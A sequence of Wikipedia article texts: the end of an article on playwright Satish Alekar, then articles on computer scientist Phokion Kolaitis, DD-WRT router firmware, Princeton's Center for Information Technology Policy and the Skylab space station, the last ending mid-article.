Smita Rambhau Shinde, Sinnar, was awarded her Ph.D. on February 25, 2020 by SPPU for her research on the topic “Reality and Fantasy in the Selected Plays of Satish Alekar” under the guidance of Dr. Rohit Kavle, Sangamner College, Sangamner.
Sapanprit was awarded a Ph.D. by the Central University of Punjab, Bhatinda, for the research “Semiotic Universe of Selected Plays of Satish Alekar and Swarajbir”, under the guidance of Dr. Ramanpreet Kaur.
Neeraj Balasaheb Borse, Dr. Babasaheb Ambedkar Marathwada University, Aurangabad, submitted his Ph.D. thesis on the subject “सतीश आळेकर यांच्या नाटकांचा संहितालक्षी आणि प्रयोलक्षी अभ्यास” under the guidance of Dr. Chandrasekhar Kanse, Sirsala, Beed.
Acting in plays
1971: As a young man in the short play "Ek Zulta Pool", directed by himself, for the Intercollegiate Short Play Competition
1974: As the son "Nana" in play "Mahanirvan" directed by himself for Theatre Academy, Pune in more than 100 shows
1979: As Javadekar in the play "Begum Barve", directed by himself for Theatre Academy, Pune
1982: Short play "Boat Futli" Directed by Samar Nakhate for Theatre Academy, Pune.
1980: As husband in "Shanwar Raviwar" directed by himself for Theatre Academy, Pune
Acting in Hindi films (character roles)
Ye Kahani Nahi (1984) Dir. Biplav Rai Chowdhary
Dumkata (2007) Dir. Amol Palekar
Aiyaa (2012) Dir. Sachin Kundalkar
Dekh Tamasha Dekh (2014) Dir. Feroz Abbas Khan
Thackeray (2018), a biopic on Shiv Sena founder Balasaheb Thackeray, as Jayprakash Narayan, Dir. Abhijit Panse (released on 23 Jan 2019)
'83 (2019), a film on the Indian cricket team's win in the 1983 World Cup, as Sheshrao Wankhede, Dir. Kabir Khan, Produced by Vishnuvardhan Induri and Madhu Mantena Varma (released worldwide on 24 December 2021)
Cafe Good Luck (2022) as Ramesh Kulkarni, Dir. Vishal Inamdar, Produced by Rakesh Kudalkar for Good Entertainment (in production)
Acting in Marathi films /Web Series (character roles)
Aakrit (1981) Dir. Amol Palekar
Umbartha (1982) Dir. Jabbar Patel
Dhyas Parva (2001) Dir. Amol Palekar
Dr. Babasaheb Ambedkar (1991) Dir. Jabbar Patel
Ek Hota Vidushak (1992) Dir. Jabbar Patel
Katha Don Ganpatravaanchee (1996) Dir. Arun Khopkar (role of the Judge, for which he received the Best Actor (Comedy) award from the Govt. of Maharashtra)
Kadachit (2007) as a Neurosurgeon Dir. Chandrakant Kulkarni
Chintoo (2012), as Colonel Kaka, Dir. Shrirang Godbole
Chintoo 2 (Khajinyachi Chittarkatha) (2013), as Colonel Kaka, Dir. Shrirang Godbole
Hovoon Jaudyaa- We Are On! (2013) Dir. Amol Palekar
Mhais (2013) Dir. Shekhar Naik
Aajachaa Diwas Maazaa (2013) Dir. Chandrakant Kulkarni
Yeshwantrao Chavan – Katha Eka Vadalachi (2014) Dir. Jabbar Patel
Deul Band (2015) Dir. Praveen Tarade
Welcome Zindagi (2015) Dir. Umesh Ghadge
High Way (2015) Dir: Umesh Kulkarni
Rajwade and Sons as Rajwade (2015) Dir. Sachin Kundalkar
Jaudyana Balasaheb! (2015) Dir. Girish Kulkarni (Released in October 2016 through Zee Cinema)
Ventilator (2016) as Bhau, Dir. Rajesh Mapuskar, Produced by Priyanka Chopra; world premiere on 23 Oct 2016 during the MAMI Festival in Mumbai (National Award-winning film)
Chi. Va. Chi. Sou. Ka (2017) as Bhudargadkar, Dir. Paresh Mokashi, Produced by Zee Cinema (released on 19 May 2017)
Mala Kahich Problem Naahi as Father (2017) Dir. Sameer Vidhwans, Produced by Filmy Keeda Entertainment, Mumbai (released on 11 August 2017)
Mee Shivaji Park (2017) as Satish Joshi, Dir. Mahesh Waman Manjrekar, Produced by Gouri Films, Pune (Released on 18 October 2018)
Thackeray (2018) Biopic film on Balasaheb Thackeray (Hindi/Marathi) as Jayprakash Narayan, Dir Abhijit Panse, Produced by Raut'Ters Entertainment (released on 23 Jan 2019)
Bhai: Vyakti ki Valli Part I (2018) a Biopic (made in two parts) on Pu La Deshpande as Ramakant Deshpande Dir Mahesh Manjrekar Produced by The Great Maratha Entertainment (released on 4 Jan 2019)
Bhai: Vyakti ki Valli Part II (2018) a Biopic on Pu La Deshpande as Ramakant Deshpande Dir Mahesh Manjrekar Produced by The Great Maratha Entertainment (Released on 8 Feb 2019)
Smile Please (2019) as Appa Joshi (father), Directed by Vikrum Phadnis, Produced by Nisha Shah and Sanika Gandhi (released on 19 July 2019), streaming on Prime Video
" Panchak " 2019) as Bal Kaka. Directed by Jayant Jathar, Produced by RnM Films (by Shriram Nene and Madhuri Dixit)' to be leased soon.
Pet-Puran (2021) as Lt. Col. Jarasandh Wagh(Retd) Web Series for Sony Liv Directed by Dyanesh Zoting (Season I, to be released in early 2022)
Ek Don Teen Char - एक दोन तीन चार (2022) as Dr. Vivek Joshi Marathi film by Varun Narvekar, Produced by Jio Studios (in making)
Acting in TV commercials and Short Films
Products:
TV Cable Co.: Tata Sky (2010)
Car: Honda Amaze (2013) for Apostrophe, Mumbai
Cell phone company: Idea - Telephone Exchange (2013) for Chrome Pictures, Mumbai
New York Life Insurance (2012)
Online purchase: Snapdeal (2016) for Chrome Pictures, Mumbai
Fiama Di Wills Body Wash (2018) for Apostrophe Films, Mumbai, Dir. Kaushik Sarkar. Link: https://www.youtube.com/watch?v=-WZyvU0n68k
Reunion Episode 3, Marathi (2018), Pickle Brand, Presented by Ravetkar Group, Pune, Dir. Varun Narvekar (short film). Link: https://www.youtube.com/watch?v=d5uzHiMeMAc
Maateech Swapna मातीचं स्वप्न (2018), a short film in Marathi for Chitale Bandhu Mithaiwale (चितळे बंधू), Produced by Multimedia Tools, Pune, Directed by Varun Narvekar
Reunion for Ravetkar Group (2018): a three-minute short film about awareness of early treatment of brain stroke, made by Ruby Hall Clinic, Pune. Link: https://www.youtube.com/watch?v=d5uzHiMeMAc&t=25s
रुची पालट/Fusion Food/ Chitale Bandhoo (2019): for Chitale Bandhoo, Pune Link: https://www.youtube.com/watch?v=9vnnp5zq0zY
Cotton King Brand - Just Stretch Your Limits (2020), Directed by Varun Narvekar. Link: https://www.youtube.com/watch?v=iqJirxo_0MQ
Red Label Tea (2021) Ad film for Hindustan Unilever directed by Gajraj Rao for Code Red Films, Mumbai
Short film Fala (फळा - तिमिरातून तेजाकडे, 2021), Produced by KC Productions, Dir. Mangesh Jagtap
References
Collected Plays of Satish Alekar. OUP, Delhi, 2009.
"Mahanirvan: Sameeksha aani Sansmarne" (A volume of criticism in Marathi on the play, edited by Dr. Rekha Inamdar-Sane, published by Rajhans Prakashan, Pune; 1st edition Dec 1999, 2nd edition March 2008, 254 pages, Rs. 250)
"Begum Barve Vishayee" (About the play Begum Barve) Edited by Dr. Rekha Inamdar-Sane published in June 2010 by M/s Rajhans Prakashan, Pune, Pages 169, Price: Rs. 200/- The book has nine articles analysing the text and the performance written by well-known theatre scholars.
Link to the Short Film Reunion Episode 3 (2018) https://www.youtube.com/watch?v=d5uzHiMeMAc
External links
Satish Alekar website
Memory by Satish Alekar at Little Magazine
Documentary film on Satish Alekar directed by Atul Pethe (2008, 90 minutes)
Book Review of Gaganika by Shanta Gokhale for Pune Mirror 1 June 2017
Look back in humour
Indian theatre directors
Indian male dramatists and playwrights
Marathi-language writers
1949 births
Living people
Indian male stage actors
Savitribai Phule Pune University faculty
Asian Cultural Council grantees
Recipients of the Sangeet Natak Akademi Award
Male actors in Marathi theatre
Dramatists and playwrights from Delhi
Tisch School of the Arts faculty
Recipients of the Padma Shri in arts
20th-century Indian male actors
Male actors from Delhi
20th-century Indian dramatists and playwrights
|
61262712
|
https://en.wikipedia.org/wiki/Phokion%20G.%20Kolaitis
|
Phokion G. Kolaitis
|
Phokion G. Kolaitis ACM (born July 4, 1950) is a computer scientist who is currently a Distinguished Research Professor at UC Santa Cruz and a Principal Research Staff Member at the IBM Almaden Research Center. His research interests include principles of database systems, logic in computer science, and computational complexity.
Education
Kolaitis obtained a bachelor's degree in Mathematics from the University of Athens in 1973, and a master's degree and Ph.D. in Mathematics from the University of California, Los Angeles in 1974 and 1978, respectively.
Career and research
Kolaitis is currently a Distinguished Research Professor at the Computer Science and Engineering Department of University of California, Santa Cruz. He is also a Principal Research Staff Member in the theory group at the IBM Almaden Research Center. He is known for his work on principles of database systems, logic in computer science, computational complexity, and other related fields.
Selected publications
Data exchange: semantics and query answering, R Fagin, PG Kolaitis, RJ Miller, L Popa, Theoretical Computer Science 336 (1), 89-124
Conjunctive-query containment and constraint satisfaction, PG Kolaitis, MY Vardi, Journal of Computer and System Sciences 61 (2), 302-332
Data exchange: getting to the core, R Fagin, PG Kolaitis, L Popa, ACM Transactions on Database Systems (TODS) 30 (1), 174-210
Composing schema mappings: Second-order dependencies to the rescue, R Fagin, PG Kolaitis, L Popa, WC Tan, ACM Transactions on Database Systems (TODS) 30 (4), 994-1055
On the decision problem for two-variable first-order logic, E Grädel, PG Kolaitis, MY Vardi, Bulletin of symbolic logic, 53-69
Recognition
1993 Guggenheim Fellowship, John Simon Guggenheim Memorial Foundation
2005 Fellow, Association for Computing Machinery
2007 Foreign Member, Finnish Academy of Science and Letters
2008 Association for Computing Machinery PODS Alberto O. Mendelzon Test-of-Time Award for the paper “Conjunctive-Query Containment and Constraint Satisfaction” (co-authored with Moshe Y. Vardi)
2010 Fellow, American Association for the Advancement of Science
2013 International Conference on Database Theory Test-of-Time Award for the paper “Data Exchange: Semantics and Query Answering” (co-authored with R. Fagin, R.J. Miller, and L. Popa)
2014 Honorary Doctoral Degree, Department of Mathematics and Department of Informatics & Telecommunications, University of Athens, Greece
2014 Association for Computing Machinery PODS Alberto O. Mendelzon Test-of-Time Award for the paper “Composing Schema Mappings: Second-Order Dependencies to the Rescue” (co-authored with R. Fagin, L. Popa, and W.-C. Tan)
2017 Foreign Member, Academia Europaea
2020 Alonzo Church Award for Outstanding Contributions to Logic and Computation (Co-Winner)
References
External links
UC Santa Cruz homepage
Living people
Greek scientists
Greek mathematicians
1950 births
|
3197446
|
https://en.wikipedia.org/wiki/DD-WRT
|
DD-WRT
|
DD-WRT is Linux-based firmware for wireless routers and access points. Originally designed for the Linksys WRT54G series, it now runs on a wide variety of models. DD-WRT is one of a handful of third-party firmware projects designed to replace manufacturer's original firmware with custom firmware offering additional features or functionality.
Sebastian Gottschall, a.k.a. "BrainSlayer", is the founder and primary maintainer of the DD-WRT project. The letters "DD" in the project name are the German license-plate letters for vehicles from Dresden, where the development team lived. The remainder of the name was taken from the Linksys WRT54G model router, a home router popular in 2002–2004. WRT is assumed to be a reference to 'wireless router'.
Buffalo Technology and other companies have shipped routers with factory-installed, customized versions of DD-WRT. In January 2016, Linksys started to offer DD-WRT firmware for their routers.
Features
Among the common features of DD-WRT are
access control
bandwidth monitoring
quality of service
WPA/WPA2/WPA3 (personal and enterprise)
iptables and IPset (on some models) & SPI firewall
Universal Plug and Play
Wake-on-LAN
Dynamic DNS
AnchorFree VPN
wireless access point configuration
WDS - Wireless Distribution System
multiple SSIDs
overclocking
transmission power control
Transmission BitTorrent client
Tor
router linking
ssh
telnet
RADIUS support
XLink Kai networks
OpenVPN
WireGuard
It is also possible to build a bespoke firmware package.
Version history
Router hardware supported
DD-WRT supports many different router models, both new and obsolete. The project maintains a full list of currently supported models and known incompatible devices.
See also
BusyBox
List of router firmware projects
References
External links
DD-WRT Forum
DD-WRT software version control
Custom firmware
Free system software
Routing software
Linux distributions without systemd
Linux distributions
|
45151468
|
https://en.wikipedia.org/wiki/Center%20for%20Information%20Technology%20Policy
|
Center for Information Technology Policy
|
The Center for Information Technology Policy (CITP) at Princeton University is an interdisciplinary research center dedicated to exploring the intersection of technology, engineering, public policy, and the social sciences. Faculty, students, and other researchers come from a variety of disciplines, including computer science, economics, politics, engineering, sociology, and the Woodrow Wilson School of Public and International Affairs.
Research areas and projects
The CITP conducts research in a number of areas, such as Internet of things, artificial intelligence and machine learning, blockchain and cryptocurrencies, electronic voting, government transparency, and intellectual property. Various media outlets, government agencies, and private organizations have cited the research of the CITP. The current Director of the CITP is Matthew J. Salganik, a professor of sociology at Princeton University.
Voting
One of the leading research initiatives at the CITP centers on electronic voting. Edward Felten, Ariel J. Feldman, and J. Alex Halderman conducted security analysis on a Diebold AccuVote-TS voting machine, one of the most widely used machines of its kind. They discovered a method that allowed them to upload malicious programs to multiple voting machines. Their research gained additional media attention when it was brought before the U.S. Senate Select Committee on Intelligence in June 2017.
Interconnection Measurement Project
The Interconnection Measurement Project is an annual initiative at the CITP that provides ongoing data collection and analysis from ISP interconnection points. Aggregated data from ISPs serving roughly 50 percent of residential broadband subscribers is collected every five minutes.
Academics
The CITP offers an undergraduate certificate in Technology and Society, Information Technology Track. This program requires students to complete a combination of core, technology, societal, and breadth courses in and outside the area of information technology. The goal of the program is to help students better understand how technology drives social change and how society itself shapes technology. The CITP also hosts a number of workshops, policy briefings, lecture series, and initiatives at Princeton University.
References
External links
Princeton University
Research institutes in the United States
2007 establishments in New Jersey
|
29441
|
https://en.wikipedia.org/wiki/Skylab
|
Skylab
|
Skylab was the first United States space station, launched by NASA, occupied for about 24 weeks between May 1973 and February 1974. It was operated by three separate three-astronaut crews: Skylab 2, Skylab 3, and Skylab 4. Major operations included an orbital workshop, a solar observatory, Earth observation, and hundreds of experiments.
Unable to be re-boosted by the Space Shuttle, which was not ready until 1981, Skylab's orbit decayed, and it disintegrated in the atmosphere on July 11, 1979, scattering debris across the Indian Ocean and Western Australia.
Overview
Skylab was the only space station operated exclusively by the United States. A permanent station was planned starting in 1988, but funding for this was canceled and replaced with United States participation in an International Space Station in 1993.
Skylab had a mass of with an Apollo command and service module (CSM) attached and included a workshop, a solar observatory, and several hundred life science and physical science experiments. It was launched uncrewed into low Earth orbit by a Saturn V rocket modified to be similar to the Saturn INT-21, with the S-IVB third stage not available for propulsion because the orbital workshop was built out of it. This was the final flight for the rocket more commonly known for carrying the crewed Apollo Moon landing missions. Three subsequent missions delivered three-astronaut crews in the Apollo CSM launched by the smaller Saturn IB rocket.
Configuration
Skylab included the Apollo Telescope Mount (a multi-spectral solar observatory), a multiple docking adapter with two docking ports, an airlock module with extravehicular activity (EVA) hatches, and the orbital workshop, the main habitable space inside Skylab. Electrical power came from solar arrays and fuel cells in the docked Apollo CSM. The rear of the station included a large waste tank, propellant tanks for maneuvering jets, and a heat radiator. Astronauts conducted numerous experiments aboard Skylab during its operational life.
Operations
For the final two crewed missions to Skylab, NASA assembled a backup Apollo CSM/Saturn IB in case an in-orbit rescue mission was needed, but this vehicle was never flown. The station was damaged during launch when the micrometeoroid shield tore away from the workshop, taking one of the main solar panel arrays with it and jamming the other main array. This deprived Skylab of most of its electrical power and also removed protection from intense solar heating, threatening to make it unusable. The first crew deployed a replacement heat shade and freed the jammed solar panels to save Skylab. This was the first time that a repair of this magnitude was performed in space.
The Apollo Telescope Mount significantly advanced solar science, and observation of the Sun was unprecedented. Astronauts took thousands of photographs of Earth, and the Earth Resources Experiment Package (EREP) viewed Earth with sensors that recorded data in the visible, infrared, and microwave spectral regions. The record for human time spent in orbit was extended beyond the 23 days set by the Soyuz 11 crew aboard Salyut 1 to 84 days by the Skylab 4 crew.
Later plans to reuse Skylab were stymied by delays in the development of the Space Shuttle, and Skylab's decaying orbit could not be stopped. Skylab's atmospheric reentry began on July 11, 1979, amid worldwide media attention. Before re-entry, NASA ground controllers tried to adjust Skylab's orbit to minimize the risk of debris landing in populated areas, targeting the south Indian Ocean, which was partially successful. Debris showered Western Australia, and recovered pieces indicated that the station had disintegrated lower than expected. As the Skylab program drew to a close, NASA's focus had shifted to the development of the Space Shuttle. NASA space station and laboratory projects included Spacelab, Shuttle-Mir, and Space Station Freedom, which was merged into the International Space Station.
Background
Rocket engineer Wernher von Braun, science fiction writer Arthur C. Clarke, and other early advocates of crewed space travel, expected until the 1960s that a space station would be an important early step in space exploration. Von Braun participated in the publishing of a series of influential articles in Collier's magazine from 1952 to 1954, titled "Man Will Conquer Space Soon!". He envisioned a large, circular station 250 feet (75 m) in diameter that would rotate to generate artificial gravity and require a fleet of 7,000-ton (6,400 metric tons) space shuttles for construction in orbit. The 80 men aboard the station would include astronomers operating a telescope, meteorologists to forecast the weather, and soldiers to conduct surveillance. Von Braun expected that future expeditions to the Moon and Mars would leave from the station.
The development of the transistor, the solar cell, and telemetry led in the 1950s and early 1960s to uncrewed satellites that could take photographs of weather patterns or enemy nuclear weapons and send them to Earth. A large station was no longer necessary for such purposes, and the United States Apollo program to send men to the Moon chose a mission mode that would not need in-orbit assembly. A smaller station that a single rocket could launch retained value, however, for scientific purposes.
Early studies
In 1959, von Braun, head of the Development Operations Division at the Army Ballistic Missile Agency, submitted his final Project Horizon plans to the U.S. Army. The overall goal of Horizon was to place men on the Moon, a mission that would soon be taken over by the rapidly forming NASA. Although concentrating on the Moon missions, von Braun also detailed an orbiting laboratory built out of a Horizon upper stage, an idea used for Skylab. A number of NASA centers studied various space station designs in the early 1960s. Studies generally looked at platforms launched by the Saturn V, followed up by crews launched on Saturn IB using an Apollo command and service module, or a Gemini capsule on a Titan II-C, the latter being much less expensive in the case where cargo was not needed. Proposals ranged from an Apollo-based station with two to three men, or a small "canister" for four men with Gemini capsules resupplying it, to a large, rotating station with 24 men and an operating lifetime of about five years. A proposal to study the use of a Saturn S-IVB as a crewed space laboratory was documented in 1962 by the Douglas Aircraft Company.
Air Force plans
The Department of Defense (DoD) and NASA cooperated closely in many areas of space. In September 1963, NASA and the DoD agreed to cooperate in building a space station. The DoD wanted its own crewed facility, however, and in December 1963 it announced Manned Orbital Laboratory (MOL), a small space station primarily intended for photo reconnaissance using large telescopes directed by a two-person crew. The station was the same diameter as a Titan II upper stage, and would be launched with the crew riding atop in a modified Gemini capsule with a hatch cut into the heat shield on the bottom of the capsule. MOL competed for funding with a NASA station for the next five years and politicians and other officials often suggested that NASA participate in MOL or use the DoD design. The military project led to changes to the NASA plans so that they would resemble MOL less.
Development
Apollo Applications Program
NASA management was concerned about losing the 400,000 workers involved in Apollo after landing on the Moon in 1969. A reason von Braun, head of NASA's Marshall Space Flight Center during the 1960s, advocated for a smaller station after his large one was not built was that he wished to provide his employees with work beyond developing the Saturn rockets, which would be completed relatively early during Project Apollo. NASA set up the Apollo Logistic Support System Office, originally intended to study various ways to modify the Apollo hardware for scientific missions. The office initially proposed a number of projects for direct scientific study, including an extended-stay lunar mission which required two Saturn V launchers, a "lunar truck" based on the Lunar Module (LM), a large, crewed solar telescope using an LM as its crew quarters, and small space stations using a variety of LM or CSM-based hardware. Although it did not look at the space station specifically, over the next two years the office would become increasingly dedicated to this role. In August 1965, the office was renamed, becoming the Apollo Applications Program (AAP).
As part of their general work, in August 1964 the Manned Spacecraft Center (MSC) presented studies on an expendable lab known as Apollo X, short for Apollo Extension System. Apollo X would have replaced the LM carried on the top of the S-IVB stage with a small space station slightly larger than the CSM's service area, containing supplies and experiments for missions between 15 and 45 days' duration. Using this study as a baseline, a number of different mission profiles were looked at over the next six months.
Wet workshop
In November 1964, von Braun proposed a more ambitious plan to build a much larger station built from the S-II second stage of a Saturn V. His design replaced the S-IVB third stage with an aeroshell, primarily as an adapter for the CSM on top. Inside the shell was a cylindrical equipment section. On reaching orbit, the S-II second stage would be vented to remove any remaining hydrogen fuel, then the equipment section would be slid into it via a large inspection hatch. This became known as a "wet workshop" concept, because of the conversion of an active fuel tank. The station filled the entire interior of the S-II stage's hydrogen tank, with the equipment section forming a "spine" and living quarters located between it and the walls of the booster. This would have resulted in a very large living area. Power was to be provided by solar cells lining the outside of the S-II stage.
One problem with this proposal was that it required a dedicated Saturn V launch to fly the station. At the time the design was being proposed, it was not known how many of the then-contracted Saturn Vs would be required to achieve a successful Moon landing. However, several planned Earth-orbit test missions for the LM and CSM had been canceled, leaving a number of Saturn IBs free for use. Further work led to the idea of building a smaller "wet workshop" based on the S-IVB, launched as the second stage of a Saturn IB.
A number of S-IVB-based stations were studied at MSC from mid-1965, which had much in common with the Skylab design that eventually flew. An airlock would be attached to the hydrogen tank, in the area designed to hold the LM, and a minimum amount of equipment would be installed in the tank itself in order to avoid taking up too much fuel volume. Floors of the station would be made from an open metal framework that allowed the fuel to flow through it. After launch, a follow-up mission launched by a Saturn IB would launch additional equipment, including solar panels, an equipment section and docking adapter, and various experiments. Douglas Aircraft Company, builder of the S-IVB stage, was asked to prepare proposals along these lines. The company had for several years been proposing stations based on the S-IV stage, before it was replaced by the S-IVB.
On April 1, 1966, MSC sent out contracts to Douglas, Grumman, and McDonnell for the conversion of an S-IVB spent stage, under the name Saturn S-IVB spent-stage experiment support module (SSESM). In May 1966, astronauts voiced concerns over the purging of the stage's hydrogen tank in space. Nevertheless, in late July 1966, it was announced that the Orbital Workshop would be launched as a part of Apollo mission AS-209, originally one of the Earth-orbit CSM test launches, followed by two Saturn I/CSM crew launches, AAP-1 and AAP-2.
The Manned Orbiting Laboratory (MOL) remained AAP's chief competitor for funds, although the two programs cooperated on technology. NASA considered flying experiments on MOL or using its Titan IIIC booster instead of the much more expensive Saturn IB. The agency decided that the Air Force station was not large enough and that converting Apollo hardware for use with Titan would be too slow and too expensive. The DoD later canceled MOL in June 1969.
Dry workshop
Design work continued over the next two years, in an era of shrinking budgets. (NASA sought US$450 million for Apollo Applications in fiscal year 1967, for example, but received US$42 million.) In August 1967, the agency announced that the lunar mapping and base construction missions examined by the AAP were being canceled. Only the Earth-orbiting missions remained, namely the Orbital Workshop and Apollo Telescope Mount solar observatory.
The success of Apollo 8 in December 1968, launched on the third flight of a Saturn V, made it likely that one would be available to launch a dry workshop. Later, several Moon missions were canceled as well, originally to be Apollo missions 18 through 20. The cancellation of these missions freed up three Saturn V boosters for the AAP program. Although this would have allowed them to develop von Braun's original S-II-based mission, by this time so much work had been done on the S-IVB-based design that work continued on this baseline. With the extra power available, the wet workshop was no longer needed; the S-IC and S-II lower stages could launch a "dry workshop", with its interior already prepared, directly into orbit.
Habitability
A dry workshop simplified plans for the interior of the station. Industrial design firm Raymond Loewy/William Snaith recommended emphasizing habitability and comfort for the astronauts by providing a wardroom for meals and relaxation and a window to view Earth and space, although astronauts were dubious about the designers' focus on details such as color schemes. Habitability had not previously been an area of concern when building spacecraft due to their small size and brief mission durations, but the Skylab missions would last for months. NASA sent a scientist on Jacques Piccard's Ben Franklin submarine in the Gulf Stream in July and August 1969 to learn how six people would live in an enclosed space for four weeks.
Astronauts were uninterested in watching movies on a proposed entertainment center or in playing games, but they did want books and individual music choices. Food was also important; early Apollo crews complained about its quality, and a NASA volunteer found it intolerable to live on the Apollo food for four days on Earth. Its taste and composition were unpleasant, in the form of cubes and squeeze tubes. Skylab food significantly improved on its predecessors by prioritizing palatability over scientific needs.
Each astronaut had a private sleeping area the size of a small walk-in closet, with a curtain, sleeping bag, and locker. Designers also added a shower and a toilet for comfort and to obtain precise urine and feces samples for examination on Earth. The waste samples were so important that they would have been priorities in any rescue mission.
Skylab did not have recycling systems such as the conversion of urine to drinking water; it also did not dispose of waste by dumping it into space. The S-IVB's liquid oxygen tank below the Orbital Workshop was used to store trash and wastewater, passed through an airlock.
Operational history
Completion and launch
On August 8, 1969, the McDonnell Douglas Corporation received a contract for the conversion of two existing S-IVB stages to the Orbital Workshop configuration. One of the S-IV test stages was shipped to McDonnell Douglas for the construction of a mock-up in January 1970. The Orbital Workshop was renamed "Skylab" in February 1970 as a result of a NASA contest. The actual stage that flew was the upper stage of the AS-212 rocket (the S-IVB stage, S-IVB 212). The mission computer used aboard Skylab was the IBM System/4Pi TC-1, a relative of the AP-101 Space Shuttle computers. The Saturn V with serial number SA-513, originally produced for the Apollo program – before the cancellation of Apollo 18, 19, and 20 – was repurposed and redesigned to launch Skylab. The Saturn V's third stage was removed and replaced with Skylab, but with the controlling Instrument Unit remaining in its standard position.
Skylab was launched on May 14, 1973, by the modified Saturn V. The launch is sometimes referred to as Skylab 1. Severe damage was sustained during launch and deployment, including the loss of the station's micrometeoroid shield/sun shade and one of its main solar panels. Debris from the lost micrometeoroid shield further complicated matters by becoming tangled in the remaining solar panel, preventing its full deployment and thus leaving the station with a huge power deficit.
Immediately following Skylab's launch, Pad 39A at Kennedy Space Center was deactivated, and construction proceeded to modify it for the Space Shuttle program, originally targeting a maiden launch in March 1979. The crewed missions to Skylab would occur using a Saturn IB rocket from Launch Pad 39B.
Skylab 1 was the last uncrewed launch from LC-39A until February 19, 2017, when SpaceX CRS-10 was launched from there.
Crewed missions
Three crewed missions, designated Skylab 2, Skylab 3, and Skylab 4, were made to Skylab in the Apollo command and service modules. The first crewed mission, Skylab 2, launched on May 25, 1973, atop a Saturn IB and involved extensive repairs to the station. The crew deployed a parasol-like sunshade through a small instrument port from the inside of the station, bringing station temperatures down to acceptable levels and preventing overheating that would have melted the plastic insulation inside the station and released poisonous gases. This solution was designed by NASA's "Mr. Fix It" Jack Kinzler, who won the NASA Distinguished Service Medal for his efforts. The crew conducted further repairs via two spacewalks (extravehicular activity or EVA). The crew stayed in orbit with Skylab for 28 days. Two additional missions followed, with the launch dates of July 28, 1973, (Skylab 3) and November 16, 1973, (Skylab 4), and mission durations of 59 and 84 days, respectively. The last Skylab crew returned to Earth on February 8, 1974.
In addition to the three crewed missions, there was a rescue mission on standby that had a crew of two, but could take five back down.
Skylab 2: launched May 25, 1973
Skylab 3: launched July 28, 1973
Skylab 4: launched November 16, 1973
Skylab 5: cancelled
Skylab Rescue on standby
Also of note was the three-man crew of Skylab Medical Experiment Altitude Test (SMEAT), who spent 56 days in 1972 at low-pressure on Earth to evaluate medical experiment equipment. This was a spaceflight analog test in full gravity, but Skylab hardware was tested and medical knowledge was gained.
Orbital operations
Skylab orbited Earth 2,476 times during the 171 days and 13 hours of its occupation during the three crewed Skylab expeditions. Each of these extended the human record of 23 days for amount of time spent in space set by the Soviet Soyuz 11 crew aboard the space station Salyut 1 on June 30, 1971. Skylab 2 lasted 28 days, Skylab 3 56 days, and Skylab 4 84 days. Astronauts performed ten spacewalks, totaling 42 hours and 16 minutes. Skylab logged about 2,000 hours of scientific and medical experiments, 127,000 frames of film of the Sun and 46,000 of Earth. Solar experiments included photographs of eight solar flares, and produced valuable results that scientists stated would have been impossible to obtain with uncrewed spacecraft. The existence of the Sun's coronal holes was confirmed because of these efforts. Many of the experiments conducted investigated the astronauts' adaptation to extended periods of microgravity.
A typical day began at 6 a.m. Central Time Zone. Although the toilet was small and noisy, both veteran astronauts – who had endured earlier missions' rudimentary waste-collection systems – and rookies complimented it. The first crew enjoyed taking a shower once a week, but found drying themselves in weightlessness and vacuuming excess water difficult; later crews usually cleaned themselves daily with wet washcloths instead of using the shower. Astronauts also found that bending over in weightlessness to put on socks or tie shoelaces strained their stomach muscles.
Breakfast began at 7 a.m. Astronauts usually stood to eat, as sitting in microgravity also strained their stomach muscles. They reported that their food – although greatly improved from Apollo – was bland and repetitive, and weightlessness caused utensils, food containers, and bits of food to float away; also, gas in their drinking water contributed to flatulence. After breakfast and preparation for lunch, experiments, tests and repairs of spacecraft systems and, if possible, 90 minutes of physical exercise followed; the station had a bicycle and other equipment, and astronauts could jog around the water tank. After dinner, which was scheduled for 6 pm, crews performed household chores and prepared for the next day's experiments. Following lengthy daily instructions (some of which were up to 15 meters long) sent via teleprinter, the crews were often busy enough to postpone sleep. The station offered what a later study called "a highly satisfactory living and working environment for crews", with enough room for personal privacy. Although it had a dart set, playing cards, and other recreational equipment in addition to books and music players, the window with its view of Earth became the most popular way to relax in orbit.
Experiments
Prior to departure about 80 experiments were named, although they are also described as "almost 300 separate investigations".
Experiments were divided into six broad categories:
Life science – human physiology, biomedical research; circadian rhythms (mice, gnats)
Solar physics and astronomy – sun observations (eight telescopes and separate instrumentation); Comet Kohoutek (Skylab 4); stellar observations; space physics
Earth resources – mineral resources; geology; hurricanes; land and vegetation patterns
Material science – welding, brazing, metal melting; crystal growth; water / fluid dynamics
Student research – 19 different student proposals. Several experiments were commended by the crew, including a dexterity experiment and a test of web-spinning by spiders in low gravity.
Other – human adaptability, ability to work, dexterity; habitat design/operations.
Because the solar scientific airlock – one of two research airlocks – was unexpectedly occupied by the "parasol" that replaced the missing micrometeoroid shield, a few experiments were instead installed outside with the telescopes during spacewalks or shifted to the Earth-facing scientific airlock.
Skylab 2 spent less time than planned on most experiments due to station repairs. On the other hand, Skylab 3 and Skylab 4 far exceeded the initial experiment plans, once the crews adjusted to the environment and established comfortable working relationships with ground control.
Skylab 4 carried out several more experiments than the earlier missions, such as observing Comet Kohoutek.
Nobel Prize
Riccardo Giacconi shared the 2002 Nobel Prize in Physics for his study of X-ray astronomy, including the study of emissions from the Sun onboard Skylab, contributing to the birth of X-ray astronomy.
Examples
Film vaults and window radiation shield
Skylab had certain features to protect vulnerable technology from radiation. The window was vulnerable to darkening, and this darkening could affect experiment S190. As a result, a light shield that could be open or shut was designed and installed on Skylab. To protect a wide variety of films, used for a variety of experiments and for astronaut photography, there were five film vaults. There were four smaller film vaults in the Multiple Docking Adapter, mainly because the structure could not carry enough weight for a single larger film vault. The orbital workshop could handle a single larger safe, which is also more efficient for shielding. The large vault in the orbital workshop had an empty mass of 2398 lb (1088 kg). The four smaller vaults had combined mass of 1,545 lb. The primary construction material of all five safes was aluminum. When Skylab re-entered there was one 180 lb chunk of aluminum found that was thought to be a door to one of the film vaults. The big film vault was one of the heaviest single pieces of Skylab to re-enter Earth's atmosphere.
A later example of a radiation vault is the Juno Radiation Vault for the Juno Jupiter orbiter, launched in 2011, which was designed to protect much of the uncrewed spacecraft's electronics, using 1 cm thick walls of titanium.
